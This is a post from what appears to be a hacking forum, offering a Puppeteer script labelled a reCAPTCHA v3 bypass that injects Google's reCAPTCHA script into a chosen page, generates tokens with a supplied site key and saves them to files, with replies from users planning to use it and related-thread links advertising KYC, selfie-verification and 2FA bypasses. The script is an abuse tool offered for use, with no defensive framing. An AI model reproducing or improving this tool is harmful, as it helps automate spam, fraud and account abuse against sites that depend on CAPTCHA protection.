CAPTCHA bypass script
by xnordx - Wednesday February 26, 2025 at 02:04 PM
#1
CAPTCHA bypass script. Help me to improve it.

const puppeteer = require('puppeteer'); const readline = require('readline-sync'); const colors = require('colors'); const fs = require('fs'); (async () => {     let continuar = true;     while (continuar) {                 console.clear();         const asciiArt = `         ┬─┐┌─┐╔═╗╔═╗╔═╗╔╦╗╔═╗╦ ╦╔═╗         ├┬┘├┤ ║  ╠═╣╠═╝ ║ ║  ╠═╣╠═╣         ┴└─└─┘╚═╝╩ ╩╩  ╩ ╚═╝╩ ╩╩ ╩                `;         console.log(asciiArt.yellow);         console.log('CAPTCHA V3'.yellow);         const url = readline.question('URL: ');         const siteKey = readline.question('KEY: ');         if (!url || !siteKey) {             console.error('Must supply URL and KEY.'.red);             process.exit(1);         }         try {             const browser = await puppeteer.launch({                 headless: true,             });             const page = await browser.newPage();             console.log('Loading!'.yellow);             await page.goto(url);             console.log('\nreCAPTCHA DONE  ?'.green);             await page.evaluate((siteKey) => {                 return new Promise((resolve) => {                     const script = document.createElement('script');                     script.src = 'https://www.google.com/recaptcha/api.js';                     script.onload = resolve;                     document.head.appendChild(script);                 });             }, siteKey);             const token = await page.evaluate((siteKey) => {                 return new Promise((resolve, reject) => {                     grecaptcha.ready(() => {                         grecaptcha.execute(siteKey, { action: 'submit' })                             .then(resolve)                             .catch(reject);                     });                 });             }, siteKey);             console.log('\nTOKEN:'.cyan);             console.log(token);             const fileName = `token-${Date.now()}.txt`;             fs.writeFileSync(fileName, token);             console.log(`\nSaved: ${fileName}`.green);             await browser.close();         } catch (error) {             console.error('ERROR:', error.message.red);         }         const resposta = readline.question('\nagain? (y/n): '.yellow).toLowerCase();         if (resposta !== 'y') {             continuar = false;             console.log('bye'.yellow);         }     } })();
Reply
#2
This is good work so far, once its completed Ill use it
Reply
#3
(02-26-2025, 02:10 PM)DataSec Wrote: This is good work so far, once its completed Ill use it

U are not alone Big Grin Big Grin
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  How To Bypass Selfie Verification HackingRealm 2,296 230,967 09-13-2026, 09:04 PM
Last Post: neox01111
  Web Exploitation Payloads & Bypass Techniques Fkz 38 14,087 09-11-2026, 08:49 AM
Last Post: blackbearduser
  Paypal Login Method [2FA BYPASS] - 2024 asgaard100 196 11,464 09-10-2026, 05:46 PM
Last Post: lexo1
  ⭐️ ULTIMATE GUIDE BYPASS 2FA ON ALL PLATFORMS | UNPATCHED 2024 | INSIDER METHODS ⭐️ Alleged 538 28,063 09-10-2026, 04:32 PM
Last Post: jjtonno1
  Bypass KYC camera verification (Binance, Revolut...) Venalita 1,604 116,890 09-04-2026, 12:42 PM
Last Post: londonlife



 Users browsing this thread: 1 Guest(s)